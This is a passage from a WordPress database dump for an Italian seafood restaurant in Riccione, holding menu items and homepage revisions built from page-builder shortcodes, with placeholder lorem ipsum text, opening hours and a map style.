16:06:27','',3061,'https://www.ristorantesolymar.it/2020/12/05/four-columns-wide-2/',34,'nav_menu_item','',0),(3348,1,'2020-12-05 17:06:28','2020-12-05 16:06:28','','Four Columns','','publish','closed','closed','','four-columns-2','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',3061,'https://www.ristorantesolymar.it/2020/12/05/four-columns-2/',33,'nav_menu_item','',0),(3349,1,'2020-12-05 17:06:28','2020-12-05 16:06:28',' ','','','publish','closed','closed','','3349','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',3061,'https://www.ristorantesolymar.it/2020/12/05/3349/',61,'nav_menu_item','',0),(3350,1,'2020-12-05 17:06:28','2020-12-05 16:06:28',' ','','','publish','closed','closed','','3350','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',3061,'https://www.ristorantesolymar.it/2020/12/05/3350/',38,'nav_menu_item','',0),(3351,1,'2020-12-05 17:06:28','2020-12-05 16:06:28',' ','','','publish','closed','closed','','3351','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'https://www.ristorantesolymar.it/2020/12/05/3351/',10,'nav_menu_item','',0),(3352,1,'2020-12-05 17:06:28','2020-12-05 16:06:28',' ','','','publish','closed','closed','','3352','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'https://www.ristorantesolymar.it/2020/12/05/3352/',10,'nav_menu_item','',0),(3353,1,'2020-12-05 17:06:28','2020-12-05 16:06:28','','FIve Columns Wide','','publish','closed','closed','','five-columns-wide','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',3061,'https://www.ristorantesolymar.it/2020/12/05/five-columns-wide/',58,'nav_menu_item','',0),(3354,1,'2020-12-05 17:06:28','2020-12-05 16:06:28','','FIve Columns Wide','','publish','closed','closed','','five-columns-wide-2','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',3061,'https://www.ristorantesolymar.it/2020/12/05/five-columns-wide-2/',35,'nav_menu_item','',0),(3355,1,'2020-12-05 17:06:28','2020-12-05 16:06:28','','Six Columns Wide','','publish','closed','closed','','six-columns-wide','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',3061,'https://www.ristorantesolymar.it/2020/12/05/six-columns-wide/',59,'nav_menu_item','',0),(3356,1,'2020-12-05 17:06:28','2020-12-05 16:06:28','','Six Columns Wide','','publish','closed','closed','','six-columns-wide-2','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',3061,'https://www.ristorantesolymar.it/2020/12/05/six-columns-wide-2/',36,'nav_menu_item','',0),(3357,1,'2021-01-20 18:42:48','2021-01-20 17:42:48','<p>[vc_row el_class=\"main-home-first-row\"][vc_column][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"bottom\" enable_parallax_effect=\"no\" left_parallax_background_element=\"776\"][vc_column_inner][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"three-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"50px 0 0 0\" item_padding_1367_1600=\"50px 0 0 0\" item_padding_1025_1366=\"0px 0 0 0\" item_padding_769_1024=\"0px 20% 0 20%\" item_padding_681_768=\"39px 17% 0 17%\" item_padding_680=\"15px 8% 0 8%\" custom_class=\"mkdf-reveal-from-left\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"1198\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_text_aligment=\"center\" el_class=\"main-home-second-row\"][vc_column width=\"1/3\" css=\".vc_custom_1533736057368{margin-top: -375px !important;}\"][vc_zigzag][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1533739073010{margin-top: -60px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 0\" item_padding_680=\"287px 0 0 0\"][mkdf_menu_popup opener_skin=\"mkdf-menu-popup-light-opener\" number_of_columns=\"one\" column_one_category=\"maindish\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1536047365110{margin-top: -160px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0 13% 0\" item_padding_1367_1600=\"0 9% 0\" item_padding_1025_1366=\"0 7% 0\" item_padding_769_1024=\"0 10% 0\"][vc_row_inner css=\".vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}\" el_class=\"mkdf-reveal-from-left\"][vc_column_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">Piatti di pesce tra tende e arredi bianchi in un elegante ristorante dallo stile provenzale sulla spiaggia</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534503338704{padding-top: 150px !important;}\"][vc_column][mkdf_portfolio_list type=\"trio\" space_between_items=\"normal\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"trio-info-bottom-hover\" title_tag=\"h6\" category=\"food\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1533811367372{margin-top: -306px !important;}\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"middle\" enable_parallax_effect=\"no\" left_parallax_background_element=\"149\" css=\".vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}\"][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1533809912373{margin-top: -86px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"0 0 0 0\" item_padding_769_1024=\"0 15% 0 15%\" item_padding_681_768=\"0 12% 0 12%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1199\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1533811471107{margin-top: -336px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"6px 21% 0 2%\" item_padding_1367_1600=\"66px 0% 0 27%\" item_padding_1025_1366=\"120px 0% 300px 20%\" item_padding_769_1024=\"54% 41% 28% 2%\" item_padding_681_768=\"73% 26% 35% 0%\" item_padding_680=\"131% 0% 95% 0%\"][mkdf_section_title type=\"standard\" position=\"\" text_tag=\"\" text_font_weight=\"\" line_margin=\"49px 60px\" line_length=\"114px\" text=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras at neque sit amet ligula mattis mollis. Proin sed tempor elit. Proin at nisi tellus. Aenean iaculis, quam vel semper mollis, justo ipsum tempus erat, vel imperdiet diam magna vitae quam. Sed fermentum mollis felis sit amet ultricies. Fusce et erat massa. Sed sed varius purus. Maecenas dictum orci vulputate mattis tincidunt.</p>\n<p>Mauris pretium lectus ante, vel aliquet nibh consectetur sed. Nam vel ligula vel turpis malesuada fermentum ut vitae quam. Praesent convallis metus nec mauris bibendum dapibus. Proin maximus ornare feugiat. Nulla a magna nec augue tincidunt condimentum. Donec elementum facilisis diam, et varius ante pellentesque et. Phasellus ac purus vulputate, accumsan mi a, convallis elit. Suspendisse potenti. Proin tempus justo eget tortor vehicula faucibus. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.\" text_margin=\"40px\"][/mkdf_section_title][vc_empty_space height=\"55px\"][mkdf_button type=\"simple\" text=\"scopri il menu\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"0 0 0 59%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1534769660562{margin-top: -190px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0px 5% 0 23%\" item_padding_1367_1600=\"60px 5% 0 17%\" item_padding_1025_1366=\"125px 0% 0 19%\" item_padding_769_1024=\"0px 5% 0 4%\" item_padding_681_768=\"0px 36% 0 0%\" item_padding_680=\"0px 0% 0 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Cucina di pesce\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"][/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"29px 0 0 21%\" item_padding_681_768=\"29px 33% 0 0%\" item_padding_680=\"35px 0 90% 0%\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://attika.mikado-themes.com/fine-dinning-concept/\" margin=\"30px 10% 0 0%\"][vc_empty_space height=\"124px\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" enable_parallax=\"yes\" parallax_offset=\"30\" parallax_smoothness=\"40\" image=\"1177\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769683015{margin-top: -374px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"202px 0% 0px 27%\" item_padding_681_768=\"85% 20% 0% 0%\" item_padding_1025_1366=\"219px 0% 0px 25%\" item_padding_769_1024=\"185px 0% 0px 7%\" item_padding_680=\"202px 0% 0px 0%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_smoothness=\"40\" image=\"1178\" image_size=\"full\"][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Alta qualità\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]Dal 1994 in continua evoluzione, con Passione ,Coerenza ,Materia Prima e Tecnica , Teo e Thomas in cucina , Barbara e Mattia in sala, una famiglia al servizio del gusto e del buon cibo sulla spiaggia di Riccione[/mkdf_section_title][vc_empty_space height=\"30px\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://attika.mikado-themes.com/fine-dinning-concept/\" margin=\"30px 0% 0 56%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1536913540691{padding-top: 130px !important;}\"][vc_column][mkdf_checker_box_circle_info icon_pack=\"linea_icons\" linea_icon=\"icon-basic-clock\" button_target=\"_self\" button_text=\"Prenota\" left_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum ligula, fringilla egestas dolor lobortis vel. Praesent eget.\" left_content_background_color=\"#f8f2ed\" right_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum.\" right_content_background_color=\"#fef8f7\" title_top=\"Pranzo\" text_top=\"Dal martedì alla domenica h. 12.00 / 14.30\" button_link=\"https://www.ristorantesolymar.it/opening-hours/\" left_content_padding=\"123px 26% 118px 14%\" right_content_padding=\"123px 18% 118px 25%\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1534769891217{margin-left: -50px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 35px 33%\" item_padding_1367_1600=\"0 0 35px 36%\" item_padding_1025_1366=\"0 0 35px 36%\" item_padding_769_1024=\"64px 0 87px 40%\" item_padding_681_768=\"63px 0 0px 18%\" item_padding_680=\"43px 0% 117px 22%\"][vc_column_text]</p>\n<h3>Ristorante Sol Y Mar</h3>\n<p>[/vc_column_text][vc_empty_space height=\"10px\"][vc_column_text]Via Lungomare D\'Annunzio<br />\nRiccione[/vc_column_text][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769906135{margin-top: -62px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"12px 0 0 33%\" item_padding_769_1024=\"162px 0 0 15%\" item_padding_681_768=\"20% 0% 99px 49%\" item_padding_680=\"12px 12% 79px 12%\" item_padding_1025_1366=\"12px 0 0 30%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_offset=\"20\" parallax_smoothness=\"30\" image=\"250\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}\"][vc_column][mkdf_google_map snazzy_map_style=\"yes\" address1=\"via Lungomare D\'Annunzio 190\" pin=\"257\" map_height=\"345px\" snazzy_map_code=\"`{`<br />\n{<br />\n``elementType``: ``geometry``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#f5f5f5``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``elementType``: ``labels.icon``,<br />\n``stylers``: `{`<br />\n{<br />\n``visibility``: ``off``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``elementType``: ``labels.text.fill``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#616161``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``elementType``: ``labels.text.stroke``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#f5f5f5``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``administrative.land_parcel``,<br />\n``elementType``: ``labels.text.fill``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#bdbdbd``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``poi``,<br />\n``elementType``: ``geometry``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#eeeeee``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``poi``,<br />\n``elementType``: ``labels.text.fill``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#757575``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``poi.park``,<br />\n``elementType``: ``geometry``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#e5e5e5``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``poi.park``,<br />\n``elementType``: ``labels.text.fill``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#9e9e9e``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``road``,<br />\n``elementType``: ``geometry``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#ffffff``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``road.arterial``,<br />\n``elementType``: ``labels.text.fill``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#757575``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``road.highway``,<br />\n``elementType``: ``geometry``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#dadada``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``road.highway``,<br />\n``elementType``: ``labels.text.fill``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#616161``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``road.local``,<br />\n``elementType``: ``labels.text.fill``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#9e9e9e``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``transit.line``,<br />\n``elementType``: ``geometry``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#e5e5e5``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``transit.station``,<br />\n``elementType``: ``geometry``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#eeeeee``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``water``,<br />\n``elementType``: ``geometry``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#c9c9c9``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``water``,<br />\n``elementType``: ``labels.text.fill``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#9e9e9e``<br />\n}<br />\n`}`<br />\n}<br />\n`}`\" zoom=\"18\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1533133353763{padding-top: 100px !important;}\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"269\" image_size=\"full\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}\" el_class=\"mkdf-reveal-from-right\"][vc_column width=\"1/5\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Richieste\" content_padding=\"124px 0\" email=\"info@ristorantesolymar.it\" link=\"mailto:info@ristorantesolymar.it\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"324\" image_size=\"full\"][/vc_column][/vc_row]</p>\n','Main Home','','inherit','closed','closed','','3040-autosave-v1','','','2021-01-20 18:42:48','2021-01-20 17:42:48','',3040,'https://www.ristorantesolymar.it/2020/12/05/3040-autosave-v1/',0,'revision','',0),(3358,1,'2020-12-05 17:31:29','2020-12-05 16:31:29','[vc_row el_class=\"main-home-first-row\"][vc_column][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"bottom\" enable_parallax_effect=\"no\" left_parallax_background_element=\"776\"][vc_column_inner][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"three-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"150px 0 181px 0\" item_padding_1367_1600=\"95px 8% 181px 8%\" item_padding_1025_1366=\"120px 6% 181px 6%\" item_padding_769_1024=\"42px 0 110px 0\" item_padding_681_768=\"30px 0 40px 0\" item_padding_680=\"15px 8% 50px 8%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"2910\" image_size=\"full\"][/mkdf_elements_holder_item][mkdf_elements_holder_item item_padding=\"50px 0 0 0\" item_padding_1367_1600=\"50px 0 0 0\" item_padding_1025_1366=\"0px 0 0 0\" item_padding_769_1024=\"0px 20% 0 20%\" item_padding_681_768=\"39px 17% 0 17%\" item_padding_680=\"15px 8% 0 8%\" custom_class=\"mkdf-reveal-from-left\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"773\" image_size=\"full\"][/mkdf_elements_holder_item][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"150px 0 186px 29%\" item_padding_1367_1600=\"108px 0 186px 29%\" item_padding_1025_1366=\"127px 0 186px 29%\" item_padding_769_1024=\"53px 0 142px 56%\" item_padding_681_768=\"80px 0 157px 25%\" item_padding_680=\"77px 0% 67% 8%\"][mkdf_reservation_popup opener=\"rectangle-with-text\" open_table_id=\"161697\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_text_aligment=\"center\" el_class=\"main-home-second-row\"][vc_column width=\"1/3\" css=\".vc_custom_1533736057368{margin-top: -375px !important;}\"][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1533739073010{margin-top: -60px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 0\" item_padding_680=\"287px 0 0 0\"][mkdf_menu_popup opener_skin=\"mkdf-menu-popup-light-opener\" number_of_columns=\"one\" column_one_category=\"maindish\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1536047365110{margin-top: -160px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0 13% 0\" item_padding_1367_1600=\"0 9% 0\" item_padding_1025_1366=\"0 7% 0\" item_padding_769_1024=\"0 10% 0\"][vc_row_inner css=\".vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}\" el_class=\"mkdf-reveal-from-left\"][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: center;\">Piatti di pesce tra tende e arredi bianchi in un elegante ristorante dallo stile provenzale sulla spiaggia</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/mkdf_elements_holder_item][/mkdf_elements_holder][vc_row_inner][vc_column_inner css=\".vc_custom_1535119322528{margin-top: -20px !important;}\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"2135\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534503338704{padding-top: 150px !important;}\"][vc_column][mkdf_portfolio_list type=\"trio\" space_between_items=\"normal\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"trio-info-bottom-hover\" title_tag=\"h6\" category=\"food\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1533811367372{margin-top: -306px !important;}\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"middle\" enable_parallax_effect=\"no\" left_parallax_background_element=\"149\" css=\".vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}\"][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1533809912373{margin-top: -86px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"0 0 0 0\" item_padding_769_1024=\"0 15% 0 15%\" item_padding_681_768=\"0 12% 0 12%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1199\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1533811471107{margin-top: -336px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"6px 21% 0 2%\" item_padding_1367_1600=\"66px 0% 0 27%\" item_padding_1025_1366=\"120px 0% 300px 20%\" item_padding_769_1024=\"54% 41% 28% 2%\" item_padding_681_768=\"73% 26% 35% 0%\" item_padding_680=\"131% 0% 95% 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_margin=\"49px 60px\" line_length=\"114px\" title=\"Chef’s Words\" title_break_words=\"1\" text=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras at neque sit amet ligula mattis mollis. Proin sed tempor elit. Proin at nisi tellus. Aenean iaculis, quam vel semper mollis, justo ipsum tempus erat, vel imperdiet diam magna vitae quam. Sed fermentum mollis felis sit amet ultricies. Fusce et erat massa. Sed sed varius purus. Maecenas dictum orci vulputate mattis tincidunt.\r\n\r\nMauris pretium lectus ante, vel aliquet nibh consectetur sed. Nam vel ligula vel turpis malesuada fermentum ut vitae quam. Praesent convallis metus nec mauris bibendum dapibus. Proin maximus ornare feugiat. Nulla a magna nec augue tincidunt condimentum. Donec elementum facilisis diam, et varius ante pellentesque et. Phasellus ac purus vulputate, accumsan mi a, convallis elit. Suspendisse potenti. Proin tempus justo eget tortor vehicula faucibus. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.\" text_margin=\"40px\"]Costante impegno, passione ,attenzione alla materia prima, tecnica, atmosfera dal 1994.\r\nCucina di Pesce, proposte vegetariane\r\nAperto tutto l\'anno[/mkdf_section_title][vc_empty_space height=\"55px\"][mkdf_button type=\"simple\" text=\"scopri il menu\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"0 0 0 59%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1533812953034{margin-top: -123px !important;}\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"middle\" enable_parallax_effect=\"no\" right_parallax_background_element=\"189\" css=\".vc_custom_1537280521172{padding-top: 13% !important;padding-bottom: 13% !important;}\"][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1534769660562{margin-top: -190px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0px 5% 0 23%\" item_padding_1367_1600=\"60px 5% 0 17%\" item_padding_1025_1366=\"125px 0% 0 19%\" item_padding_769_1024=\"0px 5% 0 4%\" item_padding_681_768=\"0px 36% 0 0%\" item_padding_680=\"0px 0% 0 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Cucina di pesce\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]\r\n<div dir=\"auto\">e proposte vegetariane</div>\r\n[/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"29px 0 0 21%\" item_padding_681_768=\"29px 33% 0 0%\" item_padding_680=\"35px 0 90% 0%\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://attika.mikado-themes.com/fine-dinning-concept/\" margin=\"30px 10% 0 0%\"][vc_empty_space height=\"124px\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" enable_parallax=\"yes\" parallax_offset=\"30\" parallax_smoothness=\"40\" image=\"1177\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769683015{margin-top: -374px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"202px 0% 0px 27%\" item_padding_681_768=\"85% 20% 0% 0%\" item_padding_1025_1366=\"219px 0% 0px 25%\" item_padding_769_1024=\"185px 0% 0px 7%\" item_padding_680=\"202px 0% 0px 0%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_smoothness=\"40\" image=\"1178\" image_size=\"full\"][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Haute Cuisine\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat.[/mkdf_section_title][vc_empty_space height=\"30px\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://attika.mikado-themes.com/fine-dinning-concept/\" margin=\"30px 0% 0 56%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1536913540691{padding-top: 130px !important;}\"][vc_column][mkdf_checker_box_circle_info icon_pack=\"linea_icons\" linea_icon=\"icon-basic-clock\" button_target=\"_self\" button_text=\"book a table\" left_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis 